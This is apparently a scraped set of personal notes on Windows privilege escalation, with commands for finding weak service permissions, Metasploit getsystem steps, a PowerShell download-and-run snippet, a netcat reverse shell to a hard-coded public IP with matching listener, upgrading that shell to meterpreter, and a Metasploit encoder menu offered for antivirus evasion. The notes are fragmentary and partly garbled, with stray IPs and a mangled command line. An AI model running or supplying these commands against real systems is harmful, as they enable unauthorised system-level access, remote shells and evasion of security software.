Professional Documents
Culture Documents
The following image highlights Java JDKs binary directory that is contained in the Systems
PATH variable:
If a service binary is located in such a directory any authenticated user can overwrite the binary
or the service DLLs, escalating their privileges. The following output shows the default
permissions Windows assigns to a newly created directory called DangerousService under the
C:\ drive on a Windows Server 2008 R2 system.
S - synchronize
AS - access system security
MA - maximum allowed
GR - generic read
GW - generic write
GE - generic execute
GA - generic all
RD - read data/list directory
WD - write data/add file
AD - append data/add subdirectory
REA - read extended attributes
WEA - write extended attributes
X - execute/traverse
DC - delete child
RA - read attributes
WA - write attributes
inheritance rights can precede either form and are applied
only to directories:
(OI) - object inherit
(CI) - container inherit
(IO) - inherit only
(NP) - dont propagate inherit
(I) - Permission inherited from parent container
Accesschk
WindowsPrivEsc.ppt
Tools
PsInfo.exe
Psexec to execute as different user
Weak Service Exploitation
#list all services
wmic service list brief
#list all services binary path
wmic service list config
#compile list of services
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v
"system32"') do @echo %a >> permissions.txt
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"
#wmic to start service
C:\Users\homerwmic service ose call startservice
Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
Windows Privilege Checker
windows-privesc-check2.exe audit -a -o result
Check Schtasks
schtasks /query /fo LIST /v
if there is any task running as system
Cacls or Icacls
Perm is a permission mask that can be specified in one of the following forms:
A sequence of simple rights:
F (full access)
M (modify access)
RX (read and execute access)
R (read-only access)
W (write-only access)
A comma-separated list in parenthesis of specific rights:
D (delete)
RC (read control)
WDAC (write DAC)
WO (write owner)
S (synchronize)
AS (access system security)
MA (maximum allowed)
GR (generic read)
GW (generic write)
GE (generic execute)
GA (generic all)
RD (read data/list directory)
WD (write data/add file)
AD (append data/add subdirectory)
FILE_APPEND_DATA
Getsystem
if fail
run post/windows/manage/migrate
and try again
Download file using powershell
echo (New-Object
System.Net.WebClient).DownloadFile("https://i.ytimg.com/vi/ndsaoMFz9J4/maxresdefault.jpg",
".\cat.jpg") >> meow.ps1
&powershell -ExecutionPolicy ByPass -File meow.ps1
netcat nc remote shell
&nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
netcat nc host remote shell
nc -lv -p 13337
Virtual box to public ip
set network settings to bridged
port forwarding on modem
upgrading shell to meterpreter-shell
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
sessions -u [id]
upgrading 32-bit shell to 64-bit meterperter shel
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
nmap examples
nmap -sT -A -PO [IP addr]
Description:
------------
Enter number: 2
What encoder would you like to try and bypass AV with.
Name:
----1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
171.248.151.85:13337
Reference
Description:
----------Avoid UTF8/tolower
Polymorphic XOR Additive Feedback Encoder
Alpha2 Alphanumeric Mixedcase Encoder
Alpha2 Alphanumeric Uppercase Encoder
Call+4 Dword XOR Encoder
Single-byte XOR Countdown Encoder
Variable-length Fnstenv/mov Dword XOR Encoder
Jump/Call XOR Additive Feedback Encoder
Non-Alpha Encoder
Non-Upper Encoder
Alpha2 Alphanumeric Unicode Mixedcase Encoder
Alpha2 Alphanumeric Unicode Uppercase Encoder
1. http://www.fuzzysecurity.com/tutorials/16.html
2. http://infosecluke.blogspot.com/2013/05/from-netcat-nc-to-meterpreter-shell.html
3. https://www.youtube.com/watch?v=j0L91QmAvVE
4. https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-MetasploitDevelopment-Environment
5. https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-inwindows-7-using-metasploit/
6. https://laharisi.wordpress.com/2011/04/07/privilege-escalation-windows-uac-bypass/
7. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-ProtectionBypass-In-Memory-Injection.html
8. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-ProtectionBypass-In-Memory-Injection.html
9. http://netsec.ws/?p=331
10. http://hatriot.github.io/blog/2014/03/10/meterpreter-shell-upgrades-using-powershell/
11. http://toshellandback.com/2015/11/24/ms-priv-esc/